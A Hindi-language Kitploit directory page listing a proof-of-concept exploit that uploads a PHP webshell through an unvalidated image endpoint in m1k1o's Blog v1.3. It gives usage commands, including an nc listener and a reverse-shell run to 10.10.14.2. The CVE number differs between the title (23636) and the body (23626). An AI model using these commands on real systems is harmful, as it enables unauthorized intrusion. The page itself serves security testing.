Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-23636-poc — m1k1o के Blog v1.3 के लिए प्रमाणित रिमोट कोड निष्पादन शोषण, अमान्य फ़ाइल अपलोड के माध्यम से, वेबशेल तैनाती और रिवर्स शेल क्षमताओं के साथ। | Kitploit
उपकरण/GitHubGitHub/cyhe50/cve-2022-23636-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcyhe50/cve-2022-23636-poc

cve-2022-23636-poc

m1k1o के Blog v1.3 के लिए प्रमाणित रिमोट कोड निष्पादन शोषण, अमान्य फ़ाइल अपलोड के माध्यम से, वेबशेल तैनाती और रिवर्स शेल क्षमताओं के साथ।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-23626 - m1k1o's Blog प्रमाणित RCE

m1k1o's Blog v1.3 और उससे नीचे के संस्करणों में फ़ाइल अपलोड भेद्यता के माध्यम से प्रमाणित रिमोट कोड निष्पादन।

विवरण

ajax.php?action=upload_image एंडपॉइंट अपलोड की गई फ़ाइल प्रकारों का उचित रूप से सत्यापन नहीं करता है, जिससे एक प्रमाणित उपयोगकर्ता छवि के रूप में छिपा हुआ PHP वेबशेल अपलोड कर सकता है। इसके बाद हमलावर अपलोड की गई फ़ाइल को सीधे अनुरोधित करके निष्पादन को ट्रिगर कर सकता है।

संदर्भ

  • EDB-50943
  • CVE-2022-23626
  • m1k1o/blog GitHub

प्रभावित संस्करण

  • m1k1o's Blog v1.3 और उससे नीचे

आवश्यकताएँ

  • Python 3
  • requests लाइब्रेरी
pip install requests

उपयोग

कमांड निष्पादित करें

python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"

रिवर्स शेल

पहले एक लिसनर प्रारंभ करें:

nc -lnvp 4444

फिर चलाएँ:

python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति हो।

टूल डाउनलोड करें